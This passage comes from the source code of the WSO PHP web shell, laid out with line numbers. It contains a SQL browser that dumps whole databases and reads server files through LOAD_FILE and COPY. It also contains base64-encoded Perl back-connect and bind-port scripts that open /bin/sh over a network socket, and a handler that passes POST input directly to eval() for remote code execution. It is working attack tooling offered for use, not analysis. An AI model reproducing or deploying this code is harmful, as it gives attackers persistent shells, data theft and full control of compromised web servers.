1120 | .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' | |
1121 | .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; | |
1122 | echo '</div><br>'; | |
1123 | wsoFooter(); | |
1124 | } | |
1125 | ||
1126 | function actionSql() { | |
1127 | class DbClass { | |
1128 | var $type; | |
1129 | var $link; | |
1130 | var $res; | |
1131 | function DbClass($type) { | |
1132 | $this->type = $type; | |
1133 | } | |
1134 | function connect($host, $user, $pass, $dbname){ | |
1135 | switch($this->type) { | |
1136 | case 'mysql': | |
1137 | if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; | |
1138 | break; | |
1139 | case 'pgsql': | |
1140 | $host = explode(':', $host); | |
1141 | if(!$host[1]) $host[1]=5432; | |
1142 | if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; | |
1143 | break; | |
1144 | } | |
1145 | return false; | |
1146 | } | |
1147 | function selectdb($db) { | |
1148 | switch($this->type) { | |
1149 | case 'mysql': | |
1150 | if (@mysql_select_db($db))return true; | |
1151 | break; | |
1152 | } | |
1153 | return false; | |
1154 | } | |
1155 | function query($str) { | |
1156 | switch($this->type) { | |
1157 | case 'mysql': | |
1158 | return $this->res = @mysql_query($str); | |
1159 | break; | |
1160 | case 'pgsql': | |
1161 | return $this->res = @pg_query($this->link,$str); | |
1162 | break; | |
1163 | } | |
1164 | return false; | |
1165 | } | |
1166 | function fetch() { | |
1167 | $res = func_num_args()?func_get_arg(0):$this->res; | |
1168 | switch($this->type) { | |
1169 | case 'mysql': | |
1170 | return @mysql_fetch_assoc($res); | |
1171 | break; | |
1172 | case 'pgsql': | |
1173 | return @pg_fetch_assoc($res); | |
1174 | break; | |
1175 | } | |
1176 | return false; | |
1177 | } | |
1178 | function listDbs() { | |
1179 | switch($this->type) { | |
1180 | case 'mysql': | |
1181 | return $this->query("SHOW databases"); | |
1182 | break; | |
1183 | case 'pgsql': | |
1184 | return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); | |
1185 | break; | |
1186 | } | |
1187 | return false; | |
1188 | } | |
1189 | function listTables() { | |
1190 | switch($this->type) { | |
1191 | case 'mysql': | |
1192 | return $this->res = $this->query('SHOW TABLES'); | |
1193 | break; | |
1194 | case 'pgsql': | |
1195 | return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); | |
1196 | break; | |
1197 | } | |
1198 | return false; | |
1199 | } | |
1200 | function error() { | |
1201 | switch($this->type) { | |
1202 | case 'mysql': | |
1203 | return @mysql_error(); | |
1204 | break; | |
1205 | case 'pgsql': | |
1206 | return @pg_last_error(); | |
1207 | break; | |
1208 | } | |
1209 | return false; | |
1210 | } | |
1211 | function setCharset($str) { | |
1212 | switch($this->type) { | |
1213 | case 'mysql': | |
1214 | if(function_exists('mysql_set_charset')) | |
1215 | return @mysql_set_charset($str, $this->link); | |
1216 | else | |
1217 | $this->query('SET CHARSET '.$str); | |
1218 | break; | |
1219 | case 'pgsql': | |
1220 | return @pg_set_client_encoding($this->link, $str); | |
1221 | break; | |
1222 | } | |
1223 | return false; | |
1224 | } | |
1225 | function loadFile($str) { | |
1226 | switch($this->type) { | |
1227 | case 'mysql': | |
1228 | return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); | |
1229 | break; | |
1230 | case 'pgsql': | |
1231 | $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); | |
1232 | $r=array(); | |
1233 | while($i=$this->fetch()) | |
1234 | $r[] = $i['file']; | |
1235 | $this->query('drop table wso2'); | |
1236 | return array('file'=>implode("\n",$r)); | |
1237 | break; | |
1238 | } | |
1239 | return false; | |
1240 | } | |
1241 | function dump($table, $fp = false) { | |
1242 | switch($this->type) { | |
1243 | case 'mysql': | |
1244 | $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); | |
1245 | $create = mysql_fetch_array($res); | |
1246 | $sql = $create[1].";\n"; | |
1247 | if($fp) fwrite($fp, $sql); else echo($sql); | |
1248 | $this->query('SELECT * FROM `'.$table.'`'); | |
1249 | $i = 0; | |
1250 | $head = true; | |
1251 | while($item = $this->fetch()) { | |
1252 | $sql = ''; | |
1253 | if($i % 1000 == 0) { | |
1254 | $head = true; | |
1255 | $sql = ";\n\n"; | |
1256 | } | |
1257 | ||
1258 | $columns = array(); | |
1259 | foreach($item as $k=>$v) { | |
1260 | if($v === null) | |
1261 | $item[$k] = "NULL"; | |
1262 | elseif(is_int($v)) | |
1263 | $item[$k] = $v; | |
1264 | else | |
1265 | $item[$k] = "'".@mysql_real_escape_string($v)."'"; | |
1266 | $columns[] = "`".$k."`"; | |
1267 | } | |
1268 | if($head) { | |
1269 | $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; | |
1270 | $head = false; | |
1271 | } else | |
1272 | $sql .= "\n\t,(".implode(", ", $item).')'; | |
1273 | if($fp) fwrite($fp, $sql); else echo($sql); | |
1274 | $i++; | |
1275 | } | |
1276 | if(!$head) | |
1277 | if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); | |
1278 | break; | |
1279 | case 'pgsql': | |
1280 | $this->query('SELECT * FROM '.$table); | |
1281 | while($item = $this->fetch()) { | |
1282 | $columns = array(); | |
1283 | foreach($item as $k=>$v) { | |
1284 | $item[$k] = "'".addslashes($v)."'"; | |
1285 | $columns[] = $k; | |
1286 | } | |
1287 | $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; | |
1288 | if($fp) fwrite($fp, $sql); else echo($sql); | |
1289 | } | |
1290 | break; | |
1291 | } | |
1292 | return false; | |
1293 | } | |
1294 | }; | |
1295 | $db = new DbClass($_POST['type']); | |
1296 | if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { | |
1297 | $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); | |
1298 | $db->selectdb($_POST['sql_base']); | |
1299 | switch($_POST['charset']) { | |
1300 | case "Windows-1251": $db->setCharset('cp1251'); break; | |
1301 | case "UTF-8": $db->setCharset('utf8'); break; | |
1302 | case "KOI8-R": $db->setCharset('koi8r'); break; | |
1303 | case "KOI8-U": $db->setCharset('koi8u'); break; | |
1304 | case "cp866": $db->setCharset('cp866'); break; | |
1305 | } | |
1306 | if(empty($_POST['file'])) { | |
1307 | ob_start("ob_gzhandler", 4096); | |
1308 | header("Content-Disposition: attachment; filename=dump.sql"); | |
1309 | header("Content-Type: text/plain"); | |
1310 | foreach($_POST['tbl'] as $v) | |
1311 | $db->dump($v); | |
1312 | exit; | |
1313 | } elseif($fp = @fopen($_POST['file'], 'w')) { | |
1314 | foreach($_POST['tbl'] as $v) | |
1315 | $db->dump($v, $fp); | |
1316 | fclose($fp); | |
1317 | unset($_POST['p2']); | |
1318 | } else | |
1319 | die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); | |
1320 | } | |
1321 | wsoHeader(); | |
1322 | echo " | |
1323 | <h1>Sql browser</h1><div class=content> | |
1324 | <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> | |
1325 | <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> | |
1326 | <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> | |
1327 | <td><select name='type'><option value='mysql' "; | |
1328 | if(@$_POST['type']=='mysql')echo 'selected'; | |
1329 | echo ">MySql</option><option value='pgsql' "; | |
1330 | if(@$_POST['type']=='pgsql')echo 'selected'; | |
1331 | echo ">PostgreSql</option></select></td> | |
1332 | <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> | |
1333 | <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> | |
1334 | <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; | |
1335 | $tmp = "<input type=text name=sql_base value=''>"; | |
1336 | if(isset($_POST['sql_host'])){ | |
1337 | if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { | |
1338 | switch($_POST['charset']) { | |
1339 | case "Windows-1251": $db->setCharset('cp1251'); break; | |
1340 | case "UTF-8": $db->setCharset('utf8'); break; | |
1341 | case "KOI8-R": $db->setCharset('koi8r'); break; | |
1342 | case "KOI8-U": $db->setCharset('koi8u'); break; | |
1343 | case "cp866": $db->setCharset('cp866'); break; | |
1344 | } | |
1345 | $db->listDbs(); | |
1346 | echo "<select name=sql_base><option value=''></option>"; | |
1347 | while($item = $db->fetch()) { | |
1348 | list($key, $value) = each($item); | |
1349 | echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; | |
1350 | } | |
1351 | echo '</select>'; | |
1352 | } | |
1353 | else echo $tmp; | |
1354 | }else | |
1355 | echo $tmp; | |
1356 | echo "</td> | |
1357 | <td><input type=submit value='>>' onclick='fs(d.sf);'></td> | |
1358 | <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> | |
1359 | </tr> | |
1360 | </table> | |
1361 | <script> | |
1362 | s_db='".@addslashes($_POST['sql_base'])."'; | |
1363 | function fs(f) { | |
1364 | if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; | |
1365 | if(f.p1) f.p1.value=''; | |
1366 | if(f.p2) f.p2.value=''; | |
1367 | if(f.p3) f.p3.value=''; | |
1368 | } | |
1369 | } | |
1370 | function st(t,l) { | |
1371 | d.sf.p1.value = 'select'; | |
1372 | d.sf.p2.value = t; | |
1373 | if(l && d.sf.p3) d.sf.p3.value = l; | |
1374 | d.sf.submit(); | |
1375 | } | |
1376 | function is() { | |
1377 | for(i=0;i<d.sf.elements['tbl[]'].length;++i) | |
1378 | d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; | |
1379 | } | |
1380 | </script>"; | |
1381 | if(isset($db) && $db->link){ | |
1382 | echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; | |
1383 | if(!empty($_POST['sql_base'])){ | |
1384 | $db->selectdb($_POST['sql_base']); | |
1385 | echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; | |
1386 | $tbls_res = $db->listTables(); | |
1387 | while($item = $db->fetch($tbls_res)) { | |
1388 | list($key, $value) = each($item); | |
1389 | if(!empty($_POST['sql_count'])) | |
1390 | $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); | |
1391 | $value = htmlspecialchars($value); | |
1392 | echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; | |
1393 | } | |
1394 | echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; | |
1395 | if(@$_POST['p1'] == 'select') { | |
1396 | $_POST['p1'] = 'query'; | |
1397 | $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; | |
1398 | $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); | |
1399 | $num = $db->fetch(); | |
1400 | $pages = ceil($num['n'] / 30); | |
1401 | echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; | |
1402 | echo " of $pages"; | |
1403 | if($_POST['p3'] > 1) | |
1404 | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; | |
1405 | if($_POST['p3'] < $pages) | |
1406 | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; | |
1407 | $_POST['p3']--; | |
1408 | if($_POST['type']=='pgsql') | |
1409 | $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); | |
1410 | else | |
1411 | $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; | |
1412 | echo "<br><br>"; | |
1413 | } | |
1414 | if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { | |
1415 | $db->query(@$_POST['p2']); | |
1416 | if($db->res !== false) { | |
1417 | $title = false; | |
1418 | echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; | |
1419 | $line = 1; | |
1420 | while($item = $db->fetch()) { | |
1421 | if(!$title) { | |
1422 | echo '<tr>'; | |
1423 | foreach($item as $key => $value) | |
1424 | echo '<th>'.$key.'</th>'; | |
1425 | reset($item); | |
1426 | $title=true; | |
1427 | echo '</tr><tr>'; | |
1428 | $line = 2; | |
1429 | } | |
1430 | echo '<tr class="l'.$line.'">'; | |
1431 | $line = $line==1?2:1; | |
1432 | foreach($item as $key => $value) { | |
1433 | if($value == null) | |
1434 | echo '<td><i>null</i></td>'; | |
1435 | else | |
1436 | echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; | |
1437 | } | |
1438 | echo '</tr>'; | |
1439 | } | |
1440 | echo '</table>'; | |
1441 | } else { | |
1442 | echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; | |
1443 | } | |
1444 | } | |
1445 | echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; | |
1446 | if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) | |
1447 | echo htmlspecialchars($_POST['p2']); | |
1448 | echo "</textarea><br/><input type=submit value='Execute'>"; | |
1449 | echo "</td></tr>"; | |
1450 | } | |
1451 | echo "</table></form><br/>"; | |
1452 | if($_POST['type']=='mysql') { | |
1453 | $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); | |
1454 | if($db->fetch()) | |
1455 | echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; | |
1456 | } | |
1457 | if(@$_POST['p1'] == 'loadfile') { | |
1458 | $file = $db->loadFile($_POST['p2']); | |
1459 | echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; | |
1460 | } | |
1461 | } else { | |
1462 | echo htmlspecialchars($db->error()); | |
1463 | } | |
1464 | echo '</div>'; | |
1465 | wsoFooter(); | |
1466 | } | |
1467 | function actionNetwork() { | |
1468 | wsoHeader(); | |
1469 | $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; | |
1470 | $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; | |
1471 | echo "<h1>Network tools</h1><div class=content> | |
1472 | <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> | |
1473 | <span>Bind port to /bin/sh [perl]</span><br/> | |
1474 | Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> | |
1475 | </form> | |
1476 | <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> | |
1477 | <span>Back-connect [perl]</span><br/> | |
1478 | Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> | |
1479 | </form><br>"; | |
1480 | if(isset($_POST['p1'])) { | |
1481 | function cf($f,$t) { | |
1482 | $w = @fopen($f,"w") or @function_exists('file_put_contents'); | |
1483 | if($w){ | |
1484 | @fwrite($w,@base64_decode($t)); | |
1485 | @fclose($w); | |
1486 | } | |
1487 | } | |
1488 | if($_POST['p1'] == 'bpp') { | |
1489 | cf("/tmp/bp.pl",$bind_port_p); | |
1490 | $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &"); | |
1491 | sleep(1); | |
1492 | echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>"; | |
1493 | unlink("/tmp/bp.pl"); | |
1494 | } | |
1495 | if($_POST['p1'] == 'bcp') { | |
1496 | cf("/tmp/bc.pl",$back_connect_p); | |
1497 | $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); | |
1498 | sleep(1); | |
1499 | echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>"; | |
1500 | unlink("/tmp/bc.pl"); | |
1501 | } | |
1502 | } | |
1503 | echo '</div>'; | |
1504 | wsoFooter(); | |
1505 | } | |
1506 | function actionRC() { | |
1507 | if(!@$_POST['p1']) { | |
1508 | $a = array( | |
1509 | "uname" => php_uname(), | |
1510 | "php_version" => phpversion(), | |
1511 | "wso_version" => WSO_VERSION, | |
1512 | "safemode" => @ini_get('safe_mode') | |
1513 | ); | |
1514 | echo serialize($a); | |
1515 | } else { | |
1516 | eval($_POST['p1']); | |
1517 | } | |
1518 | } | |
1519 | if( empty($_POST['a']) ) | |
1520 | if(isset($default_action) && function_exists('action' . $default_action)) | |
1521 | $_POST['a'] = $default_action; | |
1522 | else | |
1523 | $_POST['a'] = 'SecInfo'; | |
1524 | if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) | |
1525 | call_user_func('action' . $_POST['a']); | |
1526 | exit; |